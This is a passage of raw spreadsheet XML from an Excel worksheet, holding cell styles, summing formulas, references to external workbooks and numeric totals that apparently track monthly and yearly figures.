      <c r="T83" s="193"/>
      <c r="U83" s="193"/>
      <c r="V83" s="193"/>
      <c r="W83" s="193"/>
      <c r="X83" s="193"/>
      <c r="Y83" s="193"/>
      <c r="Z83" s="315"/>
    </row>
    <row r="84" ht="15.75" customHeight="1" spans="1:26">
      <c r="A84" s="300"/>
      <c r="B84" s="300" t="s">
        <v>231</v>
      </c>
      <c r="C84" s="203" t="s">
        <v>257</v>
      </c>
      <c r="D84" s="203"/>
      <c r="E84" s="301"/>
      <c r="F84" s="301"/>
      <c r="G84" s="301"/>
      <c r="H84" s="194">
        <f>G84+'r'!H94</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'r'!K94</f>
        <v>0</v>
      </c>
      <c r="L84" s="301">
        <f>K84+yc!L84</f>
        <v>0</v>
      </c>
      <c r="M84" s="301"/>
      <c r="N84" s="302"/>
      <c r="O84" s="223"/>
      <c r="P84" s="264"/>
      <c r="Q84" s="193"/>
      <c r="R84" s="193"/>
      <c r="S84" s="193"/>
      <c r="T84" s="193"/>
      <c r="U84" s="193"/>
      <c r="V84" s="193"/>
      <c r="W84" s="193"/>
      <c r="X84" s="193"/>
      <c r="Y84" s="193"/>
      <c r="Z84" s="315"/>
    </row>
    <row r="85" ht="15.75" customHeight="1" spans="1:26">
      <c r="A85" s="300"/>
      <c r="B85" s="300"/>
      <c r="C85" s="203" t="s">
        <v>259</v>
      </c>
      <c r="D85" s="203"/>
      <c r="E85" s="301"/>
      <c r="F85" s="301"/>
      <c r="G85" s="301"/>
      <c r="H85" s="194">
        <f>G85+'r'!H95</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'r'!K95</f>
        <v>0</v>
      </c>
      <c r="L85" s="301">
        <f>K85+yc!L85</f>
        <v>0</v>
      </c>
      <c r="M85" s="301"/>
      <c r="N85" s="302"/>
      <c r="O85" s="223"/>
      <c r="P85" s="316"/>
      <c r="Q85" s="317"/>
      <c r="R85" s="317"/>
      <c r="S85" s="317"/>
      <c r="T85" s="317"/>
      <c r="U85" s="317"/>
      <c r="V85" s="317"/>
      <c r="W85" s="317"/>
      <c r="X85" s="317"/>
      <c r="Y85" s="317"/>
      <c r="Z85" s="318"/>
    </row>
    <row r="86" ht="15.75" customHeight="1" spans="1:26">
      <c r="S86" s="310" t="s">
        <v>288</v>
      </c>
      <c r="T86" s="311">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="U86" s="311"/>
      <c r="V86" s="312">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="W86" s="172"/>
      <c r="X86" s="172"/>
      <c r="Y86" s="172"/>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80:C81"/>
    <mergeCell ref="B62:C63"/>
    <mergeCell ref="B69:C70"/>
    <mergeCell ref="P77:Z85"/>
    <mergeCell ref="O3:Q4"/>
    <mergeCell ref="Q59:Z61"/>
    <mergeCell ref="Q56:Z58"/>
    <mergeCell ref="Q68:Z70"/>
    <mergeCell ref="Q65:Z67"/>
    <mergeCell ref="Q74:Z76"/>
    <mergeCell ref="Q71:Z73"/>
    <mergeCell ref="Q62:Z64"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0.2" right="0.2" top="0.2" bottom="0.2" header="0" footer="0"/>
  <pageSetup paperSize="9" scale="55" orientation="portrait"/>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2/31</f>
        <v>0.0645161290322581</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45993</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16653.7</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'1'!H5</f>
        <v>33180.54</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6188046.57</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24297.94</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'1'!K5</f>
        <v>46884.42</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6196955.551</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>253917.754</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>67.8924475935828</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]2'!$W$101</f>
        <v>274.541666666667</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]2'!$X$101</f>
        <v>274.0625</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]2'!$Y$101</f>
        <v>260.066533889446</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]2'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]2'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]2'!$V$101</f>
        <v>64.8725074404762</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]2'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]2'!$R$101</f>
        <v>48</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]2'!$S$101</f>
        <v>5231.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]2'!$D$23+'[11]2'!$D$17+'[12]2'!$D$17+'[13]2'!$D$25+'[14]2'!$D$8+'[14]2'!$D$15+'[15]2'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]2'!$E$23+'[11]2'!$E$17+'[12]2'!$E$17+'[13]2'!$E$25+'[14]2'!$E$8+'[14]2'!$E$15+'[15]2'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'1'!H6</f>
        <v>0</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>276349.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]2'!$I$23+'[11]2'!$I$17+'[12]2'!$I$17+'[13]2'!$I$25+'[14]2'!$E$23+'[14]2'!$E$30+'[15]2'!$H$7</f>
        <v>909.78</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'1'!K6</f>
        <v>1777.36</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>263975.06</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]2'!$L$23+'[11]2'!$L$17+'[12]2'!$L$17+'[13]2'!$L$25+'[14]2'!$H$23+'[14]2'!$H$30+'[15]2'!$K$7</f>
        <v>30335.48</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]2'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]2'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]2'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]2'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]2'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]2'!$V$102</f>
        <v>35.2827256944444</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]2'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]2'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]2'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]2'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]2'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'1'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]2'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'1'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]2'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]2'!$W$107</f>
        <v>123.7</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]2'!$X$107</f>
        <v>125.85</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]2'!$Y$107</f>
        <v>131.882750665555</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]2'!$T$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]2'!$U$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]2'!$V$107</f>
        <v>31.0693204365079</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]2'!$Q$107</f>
        <v>10</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]2'!$R$107</f>
        <v>20</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]2'!$S$107</f>
        <v>2505.43</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]2'!$D$27+'[11]2'!$D$18+'[13]2'!$D$26+'[14]2'!$D$10+'[14]2'!$D$17+'[15]2'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]2'!$E$27+'[11]2'!$E$18+'[13]2'!$E$26+'[14]2'!$E$10+'[14]2'!$E$17+'[15]2'!$E$9</f>
        <v>656</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'1'!H8</f>
        <v>2655</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>528191.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]2'!$I$27+'[11]2'!$I$18+'[13]2'!$I$26+'[14]2'!$E$25+'[14]2'!$E$32+'[15]2'!$H$9</f>
        <v>2634.96</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'1'!K8</f>
        <v>4988.63</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>512733.34</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]2'!$L$27+'[11]2'!$L$18+'[13]2'!$L$26+'[14]2'!$H$25+'[14]2'!$H$32+'[15]2'!$K$9</f>
        <v>39546.27</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]2'!$W$108</f>
        <v>128.260869565217</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]2'!$X$108</f>
        <v>128.790697674419</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]2'!$Y$108</f>
        <v>127.437509860933</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]2'!$T$108</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]2'!$U$108</f>
        <v>44.7916666666667</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]2'!$V$108</f>
        <v>27.5093005952381</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]2'!$Q$108</f>
        <v>11.5</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]2'!$R$108</f>
        <v>21.5</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]2'!$S$108</f>
        <v>2218.35</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]2'!$D$24+'[11]2'!$D$19+'[12]2'!$D$20+'[13]2'!$D$27+'[14]2'!$D$11+'[14]2'!$D$18+'[15]2'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]2'!$E$24+'[11]2'!$E$19+'[12]2'!$E$20+'[13]2'!$E$27+'[14]2'!$E$11+'[14]2'!$E$18+'[15]2'!$E$10</f>
        <v>10876</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'1'!H9</f>
        <v>22495</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4157883.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]2'!$I$24+'[11]2'!$I$19+'[12]2'!$I$20+'[13]2'!$I$27+'[14]2'!$E$26+'[14]2'!$E$33+'[15]2'!$H$10</f>
        <v>15736.66</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'1'!K9</f>
        <v>30378.69</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4127857.501</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]2'!$L$24+'[11]2'!$L$19+'[12]2'!$L$20+'[13]2'!$L$27+'[14]2'!$H$26+'[14]2'!$H$33+'[15]2'!$K$10</f>
        <v>102982.022</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]2'!$W$109</f>
        <v>283.093829247675</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]2'!$X$109</f>
        <v>270.434782608696</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]2'!$Y$109</f>
        <v>271.305865698807</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]2'!$T$109</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]2'!$U$109</f>
        <v>47.9166666666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]2'!$V$109</f>
        <v>34.9527529761904</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]2'!$Q$109</f>
        <v>11.83</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]2'!$R$109</f>
        <v>23</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]2'!$S$109</f>
        <v>2818.59</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]2'!$D$25+'[11]2'!$D$20+'[12]2'!$D$21+'[13]2'!$D$28+'[14]2'!$D$12+'[14]2'!$D$19+'[15]2'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]2'!$E$25+'[11]2'!$E$20+'[12]2'!$E$21+'[13]2'!$E$28+'[14]2'!$E$12+'[14]2'!$E$19+'[15]2'!$E$11</f>
        <v>3349</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'1'!H10</f>
        <v>4569</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>922096.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]2'!$I$25+'[11]2'!$I$20+'[12]2'!$I$21+'[13]2'!$I$28+'[14]2'!$E$27+'[14]2'!$E$34+'[15]2'!$H$11</f>
        <v>3539.12</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'1'!K10</f>
        <v>6880.12</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>904108.84</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]2'!$L$25+'[11]2'!$L$20+'[12]2'!$L$21+'[13]2'!$L$28+'[14]2'!$H$27+'[14]2'!$H$34+'[15]2'!$K$11</f>
        <v>58895.822</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]2'!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]2'!$X$110</f>
        <v>0</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]2'!$Y$110</f>
        <v>268.850893251232</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]2'!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]2'!$U$110</f>
        <v>0</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]2'!$V$110</f>
        <v>34.2765376984127</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]2'!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]2'!$R$110</f>
        <v>0</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]2'!$S$110</f>
        <v>2764.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]2'!$D$26+'[11]2'!$D$21+'[12]2'!$D$19+'[13]2'!$D$29+'[14]2'!$D$13+'[14]2'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]2'!$E$26+'[11]2'!$E$21+'[12]2'!$E$19+'[13]2'!$E$29+'[14]2'!$E$13+'[14]2'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'1'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]2'!$I$26+'[11]2'!$I$21+'[12]2'!$I$19+'[13]2'!$I$29+'[14]2'!$E$28+'[14]2'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'1'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]2'!$L$26+'[11]2'!$L$21+'[12]2'!$L$19+'[13]2'!$L$29+'[14]2'!$H$28+'[14]2'!$H$35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6589.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'1'!H12</f>
        <v>14903</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4957294.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>13425.153</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'1'!K12</f>
        <v>28266.621</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5057372.997</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>362620.08400005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>82.6013858770046</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]2'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]2'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]2'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]2'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]2'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]2'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]2'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]2'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]2'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'1'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'1'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>66.535795229367</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]2'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]2'!$X$68</f>
        <v>277.460317460317</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]2'!$Y$68</f>
        <v>266.394337693732</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]2'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]2'!$U$68</f>
        <v>13.125</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]2'!$V$68</f>
        <v>71.2032490079365</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]2'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]2'!$R$68</f>
        <v>6.30</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]2'!$S$68</f>
        <v>5741.83</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2278</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'1'!H14</f>
        <v>2278</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>966821.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>3782.9</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'1'!K14</f>
        <v>8972.146</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1801916.252</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>67564.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]2'!$W$71</f>
        <v>220.25</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]2'!$X$71</f>
        <v>210.3125</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]2'!$Y$71</f>
        <v>213.487878787879</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]2'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]2'!$U$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]2'!$V$71</f>
        <v>50.1302083333333</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]2'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]2'!$R$71</f>
        <v>16.00</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]2'!$S$71</f>
        <v>4042.50</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'1'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'1'!K15</f>
        <v>473.78</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>115230.28</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]2'!$W$72</f>
        <v>70.6285714285714</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]2'!$X$72</f>
        <v>66.6865671641791</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]2'!$Y$72</f>
        <v>61.306407196622</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]2'!$T$72</f>
        <v>36.4583333333333</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]2'!$U$72</f>
        <v>34.8958333333333</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]2'!$V$72</f>
        <v>50.6603422619048</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]2'!$Q$72</f>
        <v>8.75</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]2'!$R$72</f>
        <v>16.75</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]2'!$S$72</f>
        <v>4085.25</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'1'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'1'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]2'!$W$73</f>
        <v>69.3714285714286</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]2'!$X$73</f>
        <v>66.4477611940299</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]2'!$Y$73</f>
        <v>62.930723456374</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]2'!$T$73</f>
        <v>36.4583333333333</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]2'!$U$73</f>
        <v>34.8958333333333</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]2'!$V$73</f>
        <v>52.2441716269841</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]2'!$Q$73</f>
        <v>8.75</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]2'!$R$73</f>
        <v>16.75</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]2'!$S$73</f>
        <v>4212.97</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
